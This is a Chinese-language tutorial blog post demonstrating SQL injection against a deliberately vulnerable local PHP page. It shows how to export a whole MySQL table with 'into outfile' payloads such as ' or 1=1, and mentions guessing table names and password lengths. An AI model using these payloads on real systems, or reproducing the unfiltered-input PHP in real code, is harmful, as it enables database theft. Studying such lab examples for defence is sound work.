明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線(xiàn)學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

分享一篇使用SQL注入漏洞拖庫(kù)的案例講解

發(fā)表時(shí)間:2023-09-07 來(lái)源:明輝站整理相關(guān)軟件相關(guān)文章人氣:

[摘要]利用SQL注入漏洞登錄后臺(tái)和利用SQL注入漏洞拖庫(kù)是我學(xué)習(xí)了相關(guān)內(nèi)容之后的一點(diǎn)小結(jié),沒(méi)啥深度。同上一篇文章一樣,我們需要?jiǎng)?chuàng)建數(shù)據(jù)表,并在表中出入幾條數(shù)據(jù)以備測(cè)試之用。 在數(shù)據(jù)庫(kù)中建立一張表: 代碼如下:CREATE TABLE `article` ( `articleid` int(11) NO...
利用SQL注入漏洞登錄后臺(tái)和利用SQL注入漏洞拖庫(kù)是我學(xué)習(xí)了相關(guān)內(nèi)容之后的一點(diǎn)小結(jié),沒(méi)啥深度。

同上一篇文章一樣,我們需要?jiǎng)?chuàng)建數(shù)據(jù)表,并在表中出入幾條數(shù)據(jù)以備測(cè)試之用。
在數(shù)據(jù)庫(kù)中建立一張表:

代碼如下:

CREATE TABLE `article` ( 
`articleid` int(11) NOT 
NULL
 AUTO_INCREMENT, 
`title` varchar(100) CHARACTER 
SET
 utf8 NOT NULL DEFAULT '', 
`content` text CHARACTER SET utf8 NOT NULL, 
PRIMARY 
KEY
 (`articleid`) 
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;

在表中插入數(shù)據(jù)的操作我就不貼代碼了,可以去下載下來(lái)直接導(dǎo)入到數(shù)據(jù)庫(kù)。
接下來(lái),寫(xiě)一個(gè)處理用戶(hù)請(qǐng)求的頁(yè)面,這里,我們故意不過(guò)濾用戶(hù)提交過(guò)來(lái)的數(shù)據(jù),留下個(gè)SQL注入漏洞用來(lái)測(cè)試。
代碼如下:

代碼如下:

<?php 
$servername = "localhost"; 
$dbusername = "root"; 
$dbpassword = ""; 
$dbname = "test"; 
$id=$_GET['id'];//id未經(jīng)過(guò)濾 
$conn=mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗"); 
mysql_select_db($dbname,$conn); 
mysql_query('set names utf8'); 
$sql = "SELECT * FROM article WHERE articleid='$id'"; 
$result = mysql_query($sql,$conn); 
$row = mysql_fetch_array($result); 
echo "<p>利用SQL注入漏洞拖庫(kù)<p>"; 
if (!$row){ 
echo "該記錄不存在"; 
exit; 
} 
echo "標(biāo)題<br>".$row['title']."<p>"; 
echo "內(nèi)容<br>".$row['content']."<p>"; 
?>

我們直接在瀏覽器中輸入:
127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1
即可訪(fǎng)問(wèn)article表中id為1的一條記錄
訪(fǎng)問(wèn)結(jié)果如下:

分享一篇使用SQL注入漏洞拖庫(kù)的實(shí)例講解

接下來(lái),我們就利用這個(gè)漏洞(不知道該漏洞的情況下,只能通過(guò)工具+手工檢測(cè)),演示一下如何將article表下載下來(lái)。
在地址欄中輸入:' into outfile 'e:/sql.txt'%23
分析:%23是#的ASCII碼,由于在地址欄中直接輸入#后到數(shù)據(jù)庫(kù)系統(tǒng)中會(huì)變成空,需要在地址欄中輸入%23,那么才會(huì)變成#,進(jìn)而注釋掉后面的sql語(yǔ)句。
運(yùn)行之后,打開(kāi)E盤(pán),發(fā)現(xiàn)多了一個(gè)sql.txt文件,打開(kāi)之后,里面就是表article中的一條記錄。
為什么只有一條記錄呢?難道該數(shù)據(jù)表就只有一條記錄?不是這樣的,因?yàn)槲覀冎粰z索id為1的一條記錄而已,那么能否將article表中的所有記錄一次性全部下載下來(lái)呢?
答案是可以的,只要你的構(gòu)造的SQL語(yǔ)句足夠靈活(再次提出了構(gòu)造SQL語(yǔ)句的靈活性)。
分析一下,當(dāng)在URL地址欄中輸入'into outfile 'e:/sql.txt'%23的時(shí)候,合并到sql查詢(xún)語(yǔ)句中變?yōu)椋?
SELECT * FROM article WHERE articleid='5' into outfile 'e:/whf.txt'#'
仔細(xì)分析下之后,我們可以這樣子構(gòu)造SQL語(yǔ)句:
SELECT * FROM article WHERE articleid='' or 1=1 into outfile 'e:/whf.txt'#'
這樣的話(huà),無(wú)論如何WHERE子句總是為真,換句話(huà)說(shuō),該sql語(yǔ)句等價(jià)于如下:
SELECT * FROM article into outfile 'e:/whf.txt'#'
懂了吧,該sql語(yǔ)句在先執(zhí)行select語(yǔ)句,將表article中的所以?xún)?nèi)容全部檢索出來(lái),然后再執(zhí)行into outfile 'e:/whf.txt'#'將內(nèi)容導(dǎo)出來(lái)。
不信的話(huà),你執(zhí)行下……
利用SQL注入漏洞,我們可以猜測(cè)表名,列名,用戶(hù)的密碼長(zhǎng)度(LEFT函數(shù))等等,當(dāng)然了,如果能直接向以上的演示那樣將表中的數(shù)據(jù)全部導(dǎo)出的話(huà)就沒(méi)必要去猜表名列名等等。
有點(diǎn)累了,就寫(xiě)到這里了。
利用SQL注入漏洞登錄后臺(tái)和利用SQL注入漏洞拖庫(kù)是我學(xué)習(xí)了相關(guān)內(nèi)容之后的一點(diǎn)小結(jié),沒(méi)啥深度,正如文章開(kāi)頭所說(shuō),權(quán)當(dāng)總結(jié),別無(wú)它意。

【相關(guān)推薦】

1. 特別推薦“php程序員工具箱”V0.1版本下載

2. 如何防止sql注入?介紹5種防止sql注入的方法

3. 分享五個(gè)著名的SQL注入漏洞掃描工具

4. 分享一個(gè)SQL注入的實(shí)例過(guò)程

以上就是分享一篇使用SQL注入漏洞拖庫(kù)的實(shí)例講解的詳細(xì)內(nèi)容,更多請(qǐng)關(guān)注php中文網(wǎng)其它相關(guān)文章!


學(xué)習(xí)教程快速掌握從入門(mén)到精通的SQL知識(shí)。